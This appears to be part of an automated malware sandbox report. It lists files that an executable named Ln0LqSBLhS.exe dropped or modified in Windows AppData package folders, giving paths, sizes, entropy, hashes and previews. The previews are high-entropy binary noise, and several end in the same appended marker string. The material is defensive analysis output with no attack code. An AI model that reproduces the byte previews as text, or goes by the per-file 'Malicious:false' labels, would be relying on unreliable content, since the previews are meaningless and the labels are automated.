                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:+/8QmvgjVLWH8waP273bT4jaLgoHMiKykvjhWsgm:rrAa1bLsikdv1Dgm
                                                                                                                                                                                                    MD5:CBE0A30214957EF7E5EE84AA63FCEC3C
                                                                                                                                                                                                    SHA1:C12BA316CA796F689EE477857505C135C0653C31
                                                                                                                                                                                                    SHA-256:9841A82298ABFDE8768FB567B126AC110AC2C16D229814A2E4257B7B112F1623
                                                                                                                                                                                                    SHA-512:7B03410DC6B0AE8FE919E9CE99436E00F11839480CD941C6913D6912B85996DBD6E4B93BA5A5BA48D31ABA0B4D96133F444D204D92C089D1E2395B05050CD389
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......wX.o....ou.#.&tp...U.......hL.#. .L..rig[.....Yxp. p../u...Ao..S...........y...*....?...B...gLII....7.......z=n...[.c6.P+...5..?.4$<...L]......(.#..I....=....sV...j3B..B.D...|d.2......-a..;..( ,...!..H.(...O...A.3&..6....?v.u....U...S..|s.c.eO..oXW.>.....[E......M..dz.Sq.$p"..j...%=D..H..&..(....j...r,....Lb....8..,...$..[....4...Zr .....h..<..enf..n..e.'...>.....i3d-.w7....~.(...Z2..O.I.Bh..$"...oA.j...n..7..&.#e.f..I.3........T...m....#f.Y.2..7.).. .{1jR.h.t.....a)."ej.M...4u. .v....{.i.c....jy.,..H......M....@%.....A.2...R1....ZJ....M...Q.-5.O...:.^hcL-LR.../.......(..i..]I4...j....B.......y#.....GZ....W...Kn...+...R.n.Y@].p.0|.,.$-..3Z...!....Y.,..*..n.Y.x.ede*.ZAV..cr...D.EF..kg..,.*....6^....>..D.)-P...#B....W.V.Q...v.l...S#.....|...G.?.rI.F..,:...u......F=sv....,...<...n....&..._...A|...M.....=..rg.G._0WTc..8..e.P@.....f.$.Kg.B&:P...4-#.U.]..Z.u...Q...1..u.q|.i.....R {..Y.-;....2.....w..K....@m..w......S.G.S.Uj.....Z.a..2..O..+).....+&
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978625389674523
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:DtKPNT5y2DGqmfiQJ4kB8tp9BcD+tJ56k40AaTs8s2NPJiDD:Dtqf1pmfGecvB6ygk40AaTs2JiDD
                                                                                                                                                                                                    MD5:2DBBAD65094FF4E3C60DA1C75D702890
                                                                                                                                                                                                    SHA1:42BDC3FEB8D5710A6E7A59D38E7957E7216C56A6
                                                                                                                                                                                                    SHA-256:96C1E5843DF42A823991FEECDF060831C6D3499DC013B3F0FA182780FC4E5819
                                                                                                                                                                                                    SHA-512:D7DBE1E0B32A1E784618003A4504542FC6030BB0C91CA41BBA303328C7C0A71E9DEDA3ADC0D799CABA54B467C13710982E9ABBD03C8CDFF80532FCFE1A0A0FF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 6FK.....~.8..H......0.#..).@..D6=...e..b.....B..|...aM0. .Tq{..t.&.`..e.....MId.B..nh..W[....M.K...F!...nX.@M..h....=6...%..H<J.J'.Zk.u.S..l...U......uQk4....m........+N.. .!.X..t...wu.U....>#pZkt....T.......!.(\1.H.4..!.Q..C...r.>"..o....Z.gz...].............2..[..._.cJ..Au..W\U..P.h.a.{Fj...f_.4.M}JP..^*..P~.e.\.,@~.@...AFF....o3s...+J.-..=...lk`.....k..!T..=!.$...........*.4...D}/.0.W.......%.....).....4....C....mr...G.`.d.............t.....wH1 ~..M....O.......<C=c.,.|E#F.j;.w8.!5...Q>-K...........e.<9...M...`.0*-.F....s0x7>.yd.F`WM....._.,.sK.W.X&.$}.D.W....g..]JzuFv.-......`...1.j..4......G..'.(.a.Q../...zU{8hLEK..1k*.I...9.i<g3..\.}D...sq...%|.dG.h.^....f....7...m...#p..H...V..d.VF..0.^..Q.$U._qg.%eY.o.U4._...w..-:.L..>..k3.......%yc..T..Z....@55`K.SX.t\__.d.a1...........5*.p.u......awA.f.......9..1.o...3(6W..K..~.n.T......#..+z.<.(Mk.Z.....(M+$ .w.w.."..2..."_...'..-..k....3..7.X..9.1V.....j.7..U.EzD.O....J...Vep8...}....$...'1.hp
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980124449155622
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:gUVwB1ulBo07NL4N2ZIB4FoUBOZB0BmhTv3vSp2BFW9l1zIiMuYFqL9:gU6julBo09g4v0a+/4KMfYoZ
                                                                                                                                                                                                    MD5:AAC338152A93AEFEDD196BA3C1838255
                                                                                                                                                                                                    SHA1:742F3A97885BE89461B274FC62E95C8859EA45B7
                                                                                                                                                                                                    SHA-256:2F2ADAB82D7B3757E19679668F3353FEF52927D8FE1B9C5B10787162D50D9664
                                                                                                                                                                                                    SHA-512:6CD9496E199AE2A6BBC79D3D388EAFC0CD1744B9660361D7549C4B9E81573EDE7C29F061D316F21DA54985838D63747E0DC311EB2BC26607AD506CE5879DAD8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -o..7}..V}.+...ET.iq0IX.l.%.n.....h}MP s.sL...|..}.;...U....,$T.....d.Y.G.2.e:.y..^[.;.f2~.F....'X)Z...$hDg.....[%V......./5...g3.._w...w..x...".Y.)....q[..u..@XC.mk.[.h.o.P.&..[#..%..x..Vw.........%s.....9.Tj..c."x........'d....]...?........Q..@[B....*o..c....._.\.n.Y..u.(8|..^....V...#d.....4....p....H.^...i...2..`A.Z.h...."....k3h..=.8..6......8...y.P%J.....`.u..v.G~.........-......_...Z........R.hn.....`.....P....X...+S..k.J........P..X.........qp[....a.PV..r.z....x.%.V.....|..3._p..7....Y1....&.j..(OM.P..4Z.!N."o.i....M...Bt.i...n.f...w.}..,U..=@.u..L`..Yu......n%.g.I8.u.....d...r.d....C0.8....W..P.....6....e7...o'.~.|..1.F....@x]....+...R.`.......0.$"9....U....q.E.....y{......{F......k....U...+..*?C....Z.g.C..R?...Lc.dg....}^..67.;m.....> P. ..H...S...gg../....@..$.........1|r...%......L.}.C..>6.2G.6)3...>.i.v....$.=1.. .}@.!..I...;.t.<I.D.jnCF..6..-.....(CG....n.t......T....M.Q...Pb.D..qM|..T"4...G...".9#.........t...}..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978529986156137
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5oWO4icPTMj5Fi+5gYMKqckAycqRzaY6K6Cv86MoQHi:5UmM5s+5gXPpRzaY6pFoQHi
                                                                                                                                                                                                    MD5:F6F966C214AA4C39236352B1F7E7DE6B
                                                                                                                                                                                                    SHA1:748DDEB26985DD5CE44571C823E79EFFB4761444
                                                                                                                                                                                                    SHA-256:64B7E47BAF9EE525843A387C63B0D1F4F8E20955C39C3F33ACA7FB6FF67DC908
                                                                                                                                                                                                    SHA-512:0448F5F6AD60BA8CD0F9C420AD3F2DD491D48BBCDB7D5F68075D132652C2A29DFA9FB60208C8382CE34D44609FC3953904E79F64BDFC5E5A9CBEEBA8B14D81C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +.uun........O............Dc.`.R....bJ/*(u"...8.$i,./..2...-L.@..j......hY_.C~.zS.D..R.4!H...Qj./L..j.......b.&k..7Z....4_..G.........ic[.am'.y!..X.........R.7`.}...N..n..$D.{....:..D.x........A6..W....2.......O.....J8.9.)..i..@..x.F0i.^.+b........I....H...8.E.i.ZS.W....o.o....Y.Ph?.Z.m...6.tT..M. ..1u.9....G+.O...k7....hO..3.h.(6....0.W...jY..B..5f..........{.8....}...S.a.....Y.O.......9.......y31.B.1U.a#...pQ..~...I...R[Y.q.....i.u..".p.s.Y.Vm....ut.$..K>.n...A.Iu..?.,.S;w34.M7R.[...G.#.D1J.6;_H..+..+.o..a.@8Sk.U/.........%..y."|v.@.ed......c.w.3?E..l.../.`9.^.y.Q..87..v..~.M..{..F!..3.-Y.ESYb#V..B......P.%!...Rz.S.^...$..(yv3..uN..X..l..@..\.......82..b...3.\..A/.91.v....Z.o..^*.....I@.+.....8..o9..6..Q.A..........T.aO&.k....x....Y.X3....V._%....X.l.........]..+.s...".S....\s_!7.]..Rk..8}.9..(;K&.../4LL.'.......*..E`h.C..8......[q......-kSQ...Y..).W.4n.x..X....p.I2i..6....MD..\..*.8.s..aW.|C...:.....or.P.HH.y..[.q%.l....6..H-./.o...#7
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977955510562701
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cJHIQimKovwoS+lwbbjf4sgXBxRdxg4wIRhK57wSW8yeJS:2HNKoBHlUfQvpXZi5xEeE
                                                                                                                                                                                                    MD5:947B2660D538BB1F9A923AE580884D67
                                                                                                                                                                                                    SHA1:2607FE6E2FDA817016A70C05F7531A6CD5FF2CBE
                                                                                                                                                                                                    SHA-256:2DC9A45A7C5611F41CBC360E435C86470327E9B13F56A1E9088E321B4AFE09F8
                                                                                                                                                                                                    SHA-512:46E6C50F647B3BACE95C8E22FB81040C5B6A79B472868989C2C286EE7A017F001BF7E3202E9B34B2E4067B711F91B48DC0B0BB25DA88C9BBDE3CF92B4B201021
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..NB....'c.T`6..S.@. @...C..t...&C.V...#..:2.RE.@...I....a.jN*....u.K.o.J....EW...;.b.2..z;....+b.U.."..Tz.y..y#......E.......?.K0?.@.....C....4....d$..)C+..G.'bV^...@... .q...:..:j.."/...s.)...X.....p..wi....f.1..N.Dd...".....X....}......Bz.n.=Ir......o.Xg...5}q.z....+..ZZ.'C.b.v?~ff.q,.u8B...8..<= dcWX..hD>...L!&...$. 8:.9b.,,'..f.4.BS9..4dr......(.'.-......le.f.r}s..\...[<..._([...G...dc...u....a.*..]..q_S..._.2F"..q.W....+.~..3..Cke.|.~w.N..NVQP..s...E.|.y.../4V2S............V.|.Ow.L..4.tL..$.....-.{5.>m.......P>V.$.....%T...uS...l.k.Z......@].kCv..i......^~.....z.)....2i.7.....i....q.kR...J.D.rK,\.....N8.._.I.#.?..^!..ky...s,#.^.......Np.W....U..V..E...$PY......C+.>.+z..xvX.Wu!^.U....s...|.[[..k...[..RTk\.f.[......=..ra..SC......;BM.c...O....{ &r..i....9<z.Y..J...%..x....{.T..)..ep*0.....f.;..e^.z...........L......j..y>..MNyW......J............u....<.....q&.....[.EO.w.Z.=F.B...^H...a..\.g...............7U..E.h.$g..."h..1H..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978737566724582
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wfEMzQbnuo+PMSmrdqufSTWnPWcNty9nCbH+Bp0sUrl:w7Mnuo60PWV5C29Uh
                                                                                                                                                                                                    MD5:CD89F00453BB2C14B297B75DC12B313A
                                                                                                                                                                                                    SHA1:25FAB220476CC45F4D1403804D8AF7554276D9BC
                                                                                                                                                                                                    SHA-256:576072D5D40D93BE0FC330E5CF8AD1879976E9D3E671722F41CFF2E7B65E9E54
                                                                                                                                                                                                    SHA-512:9E03032F03A1737084FB2809017E574B1914035091CF43768F5C80EF3093D7B91D938A2BF6EB42F05881D45B8B0EAFF0BC055ECB24F2D7A75FA186134AA8E05B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...3...#).F...(..'.....[.NB.p..,...(...q../.[d.....K|1f..L.q...z;w.YT.O.=F.fS.CfR2....>..i..3..C.P^.?Z..+S.k....c.T...4...../U......SV...g..<..q<v1(.XE..#J...o.^..lOH4:..G.&..8.{..;..d68Y..Fj.)..<..u.m....Y..>.....HV.9....K%2_l..;.t. }.C..J.{MQSw..)og..pN..g+."........d.:.q...k.>.!!z.k15.n+`0...L.,.[....l .^..7. #b_..=>.(../..e......G..V....`8...|.T.Sz.s.Y. }..<^.....S.. Kkc..&....#..#.H...!.D.<...+........{=.../.jn-...Q.G.fW.M..P".........q...Q.f^,pb....1..F...?.L.{n../.aO....%\a=./...s.q.....C.d..,D.p..P...SI.zD.W..'n.?3.B)......../5.t):.@..7?6m..G..IL..}.9..~.......S../.].X.:.........H.E.C..,....W..Y..65...+3...B4....+...97.t..r.}...yx.E.G.* k..._.7b...5/]^$.W.-}/?....5....].c.$#..f.h..@..>.7..u.#..7.H.9....r1....q:{r...4.]..+U.j.\X..T$..C4.$..B..r#..{1>@.!>3z3..{..tb..X.(.YA8n......_s..q"Y....7..d.Tm5...u.}.."D...zi....W.[.+.Ug......{v1.?I./^...u.......+..4.#A-..A=H5....."...-2.e..I.....O.%.....J..5X..X9u.,.{INu..&/0;P.k.+.....7..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980546030373587
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:GzqZlkzo1zphZTi+XjxQ5SiAl+PgGh0cMemh8n:GIp3hRi+XjxT0Pccz1
                                                                                                                                                                                                    MD5:98A995329B0EB44C62A5C56140BC4D03
                                                                                                                                                                                                    SHA1:2D3726D117F5C2CC3D63629B0D90B422006F8CB0
                                                                                                                                                                                                    SHA-256:87152E42676DA0E0F589FB0462A84918C6306C75AF3835E8FA450DEA4DD66367
                                                                                                                                                                                                    SHA-512:7B32A25CA723E4A91D19C4F3EB8AE1FD9F9C1DCA8BA7F4B569E6589CDEA2E46D076E0937677232273B6EB99913EC04D77E72A0103CC25FDA2B65F718F9ED63A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....0..7H.8.kv1u.A...S..r.IN$......~t...........Z...F...........Q..........=.a..*.t...f.G.n.4EC..Z../Z.m#....._F.!. .[~:^..G..t.....3p.)...A....AH.....i....i ...c.....GO[............2H..^..EkX..w.XS.3v...{v.w..-.8.sk...x.~.:...pUP.G....F...sp..Ch....tKGr#..={...$......-I.G+.3.@i.ld1...;...(..R...;u........[....<...!A|......erA}..v.....+..86...[.......yWIe..&8.h..bf."..T.....Z...Xb......9..N...P8.[.>B.!...h..(..x.......to.I..u..^^~..'kSU..p1.U.....C..hw.>;F.TXr:L.*..b.c.../=.....Q..XH..6,[....m.....S@......9d.?.@G..-cv)i%9.;e..H o@]...-....>......*x.e.c.n.. ..C.k.iY.zw7...(s...nq.-%4 ..d+P...ip..H.~+n...:..E.Z.....0.++.c.n..T.$......!O2.....>.w.....d...\......w.....=.)"65...:...8..S...u.%j.`K....gh1..8&....].?.m?"....i.u.:.`....q.Cb..IG......K..n.4..B./.>.....Fb....E..cP.a..'k.y..AR..}.<..........[.y._6.pCP../.].M#.+.M..{j6a.aD+b].v$>......s..E..F...0..9}..sO^.i.u.z.;.(.x.......e..,.;3e....B..n.<..; .x.r..h.}.^pR...s.cy.tN.Dq-...J%.....>.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976682342822029
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:EKIUPzVKU76z0sVQUKBKMfZHMqOQ1mUUS:4izl764sRKoMhWQ1mUX
                                                                                                                                                                                                    MD5:17167CFD2CDD13D9473DCBD6027CABA0
                                                                                                                                                                                                    SHA1:B87F98D3BE847BCF3E188F3B482109CF3E5649A2
                                                                                                                                                                                                    SHA-256:7AB460CE9897074FCDBAFE0D9D9D7034CAD35B214C68C8837765BF47E54A9C2D
                                                                                                                                                                                                    SHA-512:BF5B44D0668806490099E2C69A2551428AFC602B3680164A2C81438DBA98D0319A131BAC61415649530433642EB88BA1B4BF8B11E41D75D5077F5645659D7F51
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .8&...0..P 223.8.d8....'.I.r.....[.*...Nt{.)..K.t~.Ga...9.7.d..!.]\..>..\./..<...Vd[.h..x..5.@.E...+0.0.4.$..(...p......O}..C-.k..#..m....Q.....-.q.!.;.<O..yW.F..w....7........,&...RM.;........`..Yx..k..I...T.U...@..t{..V....Qb.".....T8B......[.t>$!....\...bD.s^.~{.."H}.`...+...J.kg.z....d....!k.>.a.........#.E.......K..6_..{.P.5..'.71...{....d(\.i...fz$..L.+..g...}S.n....N[._x..O....l...6&.h5...u..4Q(..A.t..\..6.........H]..pX.~d.U..}.b....wQ...'f.2).a......M'.I.#3....G.y../Z:.....J..........x...UJ.>.)\......y....@`.#w^...@5r..}..[K..1....FG..>.k..4....+.gNsm..T..s..$C..~dH....V......c....#].[.......q...%.'?U....@..3eL...Ed...Xrh.s.....,n.b.....O./....... ..B..4N}..h.[....N... ..8A.]..?+.tD...?........vs.....iW.H.;.Q...6...pY.a..@........C.S8.i.\(..J.0.Z......L.e^...W...E4......_.kD..x....]..A.G.O*...C..../.......8l..s....]..DJ..b..^=L....aI..................V.......B.s^mI*.&.. .....0.yG.P...xpM..b..*./.. .k,D.Jp.....u...4../q
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0454e1a0-16d5-4b25-bcbf-9e6f0b2c3d13.920e337d-28f6-4cb9-bdf5-b28eae67f68f.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.8643335846017
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KTk2x0CdEtmT+YNP6oRgYkdciAzCMQ+//5uYsWRNbUU5+okK5b6LBq9vydijrXbD:KTk2x0CdECHioRgYpFzCMQ+H5XlPJ5+g
                                                                                                                                                                                                    MD5:9E6DA3434E884E49D51FB8A767B08726
                                                                                                                                                                                                    SHA1:22A4E5CCE07F48A97FF9DB16D376CC9B97EA52F6
                                                                                                                                                                                                    SHA-256:A74D9095EE4F875431C7074B802FA2DDACAC414DBBC46C28C7C6F7249C371F68
                                                                                                                                                                                                    SHA-512:350EB05A705764A519C04BD429A3CC30AA153FEFB13BF133333971A284F61A547CFBB683477F7381752B89BEB280E1D532EFC23203F5C9B8C96E7334A30B9264
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..NK:..xA.e.!.kl..fn..g^...Y....R.]@.-v5......F.... ...C.......X....-H.w...a..$6..V%...Kt..U..u..cZ,g7.....g......{..<"....+..KI..K@p...C;...C..........Z.>..+...Q..).....;..I)Q.M.&..%........i..E<*..J..>..H^.^.E9.6.....%./..uH.~.b..J.Val..'....PfC.\3g......"."..LW{.=_._.Y.K.........E....'/.E..p.}..u.Q.?..........=.H.ZD..\.=..Dy.%...i...g...0.74.p..?.M...#..q..vW.......P1.O3...4p0H..i......K.. .Z...K0...z..vFR.Y.n.iql.2...a]%U....X.N.\b..D}.{^.hd#TT.G.9DU....ge........4..........>O#.....j......W...$.....!...p...'.G.4BO....F1...or.B....,...]....w....X......f...x Dj..q.............[.T..G,.:S73..[._@.+.8].l.>.C).$.L.~m[.....T+M....V..%....).a.B.....p.d..B...!..R.... ....o{Lr...=..X}....c...(1X..........M...= ...{X|2...0.1..E.&m=..0a*..k."...D.n....#.<z+evZ..F..(.K.,.`.....=..P.{.1......o.>J^....f.:<Qe......a..#.\....n.......uL.o...f.b.y.HZ...l;6..>...1sp.u...H[..W.K....F.....JZ....[T.Z..6..........?z..M..t.W.^jX..,./...Q..o^.Cd.l....<.._..P..?b*.~k.6.`>.b.. .
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\0454e1a0-16d5-4b25-bcbf-9e6f0b2c3d13.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.66838117665293
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:p/DWLs5K5/TzYDTl6uGp5EtGdw4Golwrx0vH5ZXvV4HzwTUD8RgUJ/Pedcii9a:NDW1pHWJ6uGBPUaPvV4Hzw4D8RvJ34bD
                                                                                                                                                                                                    MD5:2E180D7CFF1271D47F3FE11F224450DD
                                                                                                                                                                                                    SHA1:9EEBCB04FF7D6A59B65D2AE617830C99DE13E839
                                                                                                                                                                                                    SHA-256:CB92453BDFB3E9F3EB4F4CF45F391523D409BA4A819AB546198541B6D4745D45
                                                                                                                                                                                                    SHA-512:9FFCCE4386C7C3F037BE7FFA931B304351BC14210AD568A48C6486BA612406A8E5C6D5235FC63CD6E2B447B2A2CA8A660A4DD536B672C49DFB7E0070C62E1DA4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Zz.j:y3....m.5.bW/.>..f.X.cL..p].%n....f&....~F.?i.....R.....L..&.q...I......7...L.dl.@"?........x.*.f...S.2...-.....I.]....x.l...r\.+...C.;6.j..6z..3....>S@.H.s+.9L.;.7n..1#F.7......&.e.Pz.D.n....{...<...m.........U.=....8.qs@......>....r'.2.U{......p.v3d....]d~L.i..|.........rt.!J""&....[.a.9-S7..Q..GJ...y}..........W......T..).Id..l.C......-..0..qYx....../<...jrD..n:...vA+p..R....g..D...!..".6*T....6+.Wk."...c. ..A.W.V$M....>.9......b.,.Y.U..s....d.@...VC..h...sO. .T.x....V.h..iR.y.....x.....!1>......w.tSY.qJ.D...R..jIr~..;...WZ..{.......:DT2r}Z..z....Wc;..d..j.K.G.J../....b!...-.,.T.....k.{.z&...=^.*g)2.J.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\04b10f1c-8549-4a89-a041-4bdc43d040a4.8835b619-35bf-415a-946b-ce935d9d2bb5.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.852421255121026
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3pDk8Ig6J1Zgi2TVrx8qV/UmTJFgSeozqSl2BdumeGx82Nj48KnfQatwNXQ2wpIA:3xkY6J1wZrxHMKJLeSl2BcmeGZjCno0B
                                                                                                                                                                                                    MD5:6BCF624FC2E1A72F1028BA06844E992A
                                                                                                                                                                                                    SHA1:B327C71E8C83600BAACFC469928AE3DC2A29EE45
                                                                                                                                                                                                    SHA-256:D48B181F39FD916CCE1DA7FB9F0575DD7AD413B2676F07A6342415F16B446F75
                                                                                                                                                                                                    SHA-512:87A0196AAF05A3F33BBC23FEC02576A42A5130605A777D4FDD4FC0992D49B1F474F7EAB7A7B0B6C5ECD788887268744BAF5E3E984FCC570A89B9B5781CC76D58
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .f..l...K...E.#:....,.......c..e..?)w..?.C......)\@I...."...M.\.#....U..4....X.......w..~....;...t..O..m....&.Wnv....>)...Bj..:w..P$E....u..&.$....:.<)...,G59b..... [...k._...,K...n....D..m.n.\k).......5.c.6...e..FT..q..Kk..g..R..eJ..7.....S...U?.s}..;..Dr..Ga..g.6u...Kv.a.......\N.fF..M....r.....j.f...$....+Vz...w..k-@.3...e.Nf.....H=_,\>..p..^G~Xw:G..8...oj.l..=d3.Q...G.Y....i'bch...v.3.2..a.....y...<.8.bi..+Q..yR.?".#/g....6.W"x.../.m..n/....".N...R.Z.c....b....j.....e........I3G.I.......@N..j..F...>.[}.7.d.?......H9....4.t..].(|'m.[P.4|t...i>..Z..|...W..x`....]....k...^}P^......Q...V.......}L.I./........g.@ O.IJ.%`q.....N.6|Vp.._"I..u...!.h..b..@QY.K.h[.....a...]a.......N.<I".yO..F...|..I.-O.0.b.....g(.I...z.\.[....<.x.....9.......S..m5._.B......?..}...|..9o0..yb]....J2.X.t......z.......2Q~.....J..D.4V..H....>.w...Cn".1...1(...P.../&...G.3...{Fc.\.]%'l...i.o..Y..=....d..T9..." :LXH.../u.#.f.rF...b....J+.....@.<.."..P......0H.y...a....L _......P
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\04b10f1c-8549-4a89-a041-4bdc43d040a4.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.638573089751754
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:oIw9nqGOZgyakr9zsC2HPfLO3GWRKAyG6uyvk2Y6dxPdd66pSN9/womradgig7XW:VwG2vfLOPKiyvk2db66pkmWgbkbD
                                                                                                                                                                                                    MD5:425E470DC59B6D0D1B73AE8A42A947AC
                                                                                                                                                                                                    SHA1:5A552542CE1FD75D23024D205BE0C80AB1AA966B
                                                                                                                                                                                                    SHA-256:1F737821386430D304D5372AEA95864950AEEFF145ADC864CCEF37FB36061C90
                                                                                                                                                                                                    SHA-512:3F94409B6AC3A168480046FC0C2D3E7F1838349A3BCA196369CFE12E262D5BED9B08584C6439E1F3A5835A6DAF3CA924745D5D80710571BCDC191CCA7141E2F8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...L68.;12E.qV.)....K1.}.....*.....8...{gH.e.w.C...0....C.pG*..+^.L4._..^w.RO$.....A...b...:.:-.[*c..n^....g.;7..h7.~j.......Q].W.....LPj{....0.Df.VfX.d.w.......%..wa*..{..=9..._}Q...B.K..N..6..5.Q'y8.)8m..V.8.e.n.8fc.*......f..=..lX...@C.F{.. ./\. .<S..wh.....>.Y._../.z{...=.I....}MJ..s)...j....p....}.`.] ..._..:.i.w.k..`.X.lo.....j...]%N......C...k5K....M.}......n..D._13..Ce....-Hrn&..`{..,..N...4VTst32...x.t!7......{g....*+.{+...a...D=.UR}..>.Nt...Lz.P.%....z.+4&.r.\...Q.~.....z.j...5.z ......].j..*h...5,7......@[.5.._.b@..w#.......;]Nt.3..K..k=.5...85.......CJU...]J..5.3.H.C....xk..d........R.Xr.w....d..~.E..F9.x<...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
